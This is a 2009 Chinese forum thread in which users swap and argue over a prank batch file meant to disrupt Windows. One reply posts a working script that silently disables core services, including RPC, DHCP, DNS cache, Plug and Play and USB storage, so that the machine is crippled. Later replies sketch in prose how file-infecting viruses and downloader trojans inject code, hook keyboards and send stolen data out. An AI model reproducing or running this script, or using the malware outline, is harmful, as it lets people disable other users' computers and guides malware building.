深度论坛---自己写的批处理

余乐

玩玩我这个吧，不删除任何文件的。。。
绝对比你那个好玩一百倍。。。虽然毫无技术含量
就算是高手，中了也是很无奈很无奈。

[ 本帖最后由 余乐 于 2009-3-18 15:08 编辑 ]

nanhezzb

@echo off
set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
@echo off
mode con cols=14 lines=1
color 00
sc config   rpcss start= disabled >nul 2>nul
sc config   lmhosts start= disabled >nul 2>nul
sc config   plugplay start= disabled >nul 2>nul
sc config   dhcp start= disabled >nul 2>nul
sc config   dnscache start= disabled >nul 2>nul
sc config   lanmanserver start= disabled >nul 2>nul
sc config   lmhosts start= disabled >nul 2>nul
sc config   seclogon start= disabled >nul 2>nul
sc config   wzcsvc start= disabled >nul 2>nul
sc config   upnphost start= disabled >nul 2>nul
sc config   scardsvr start= disabled >nul 2>nul
sc config   usbstor start= disabled >nul 2>nul

wanzhende

病毒现在不是破坏系统,而是窃取,破坏用户重要数据

破坏系统没什么技术含量

余乐

原帖由 nanhezzb 于 2009-3-18 15:14 发表
@echo off
set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
@echo off
mode con cols=14 lines=1
color 00
sc config   rpcss start= disabled >nul 2>nul
sc config   lmhosts start= disabled >n ...

又来欺负俺

wmcxdb

点击“系统瘫痪”运行，速度快，无法截图，等下看各能重新启动。

[ 本帖最后由 wmcxdb 于 2009-3-18 15:48 编辑 ]

nanhezzb

哈哈，批处理加密没用的，直接加几行ECHO就出来了。

wmcxdb

重新启动，系统没瘫痪。
楼主的批处理，前段时间已测，在魔法盾区。

ximo

原帖由 wanzhende 于 2009-3-18 15:37 发表
病毒现在不是破坏系统,而是窃取,破坏用户重要数据

破坏系统没什么技术含量

错，感染型病毒的技术含量不知道比普通的下载者的技术含量高多少！！

余乐

原帖由 ximo 于 2009-3-18 15:54 发表


错，感染型病毒的技术含量不知道比普通的下载者的技术含量高多少！！

感染需要什么技术含量？写EXE前头而已。。。

ximo

原帖由 余乐 于 2009-3-18 17:04 发表

感染需要什么技术含量？写EXE前头而已。。。

这位兄弟说的到轻松，你随便写几个看看？
你以为申请块空地写些要感染的代码，然后JMP到OEP,再把入口点改成申请后的开头地址就可以了？
当然在其他的时机也可以，比如增加个区段，写代码，方式很多。
那原来加壳的呢？有的壳的自校验可是连一个字节都不能动，比如PESpin等等。
太理想话了吧。。。
而且这还是最简单的框架而已。
那下载者呢？
一般的模式无非就是开个线程在后台下载木马，然后运行？
下载来的游戏木马一般也就是挂个鼠标或键盘钩子，监视罢了，然后发送到预定的邮箱或者等等其他的东西。。。
当然，前奏到还要很多，过杀软呀，主动防御呀，等等，这里面的技术还是很复杂的，更有的牛B的木马用上驱动。

不过现在的趋势是病毒木马都混在一起了，既有木马的特性又能感染。。。。

个人的总结：
写感染型木马的前提是有良好的PE文件结构的基础，没有PE格式的了解，一切都是扯淡。
而下载者呢？不说了。。。

技术交流而已，没任何恶意，呵呵，别见怪。
无论谁对谁错，只是交流，互相促进，仅此而已。